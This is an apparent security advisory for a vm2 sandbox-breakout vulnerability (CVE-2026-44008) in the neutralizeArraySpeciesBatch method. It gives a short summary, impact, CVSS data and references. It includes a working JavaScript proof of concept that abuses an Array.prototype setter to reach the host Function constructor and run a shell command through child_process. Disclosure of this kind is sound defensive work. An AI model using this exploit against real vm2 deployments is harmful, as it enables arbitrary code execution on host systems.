CVE
CVE-2026-44008
vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
The new method neutralizeArraySpeciesBatch works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host Function object.
PoC
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const a = [];
Object.defineProperty(Array.prototype, 0, {
set(value) {
a.f = Buffer.prototype.inspect;
value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
});
new Buffer(a);
`));Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
Package Versions Affected
Package Version
patch Availability
No items found.
Automatically patch vulnerabilities without upgrading
Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request
CVSS Version
Severity
Base Score
CVSS Version
Score Vector
C
H
U
-
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
C
H
U
-
Related Resources
No items found.
References
https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq, https://github.com/patriksimek/vm2, https://github.com/patriksimek/vm2/releases/tag/v3.11.2
Basic Information
Ecosystem
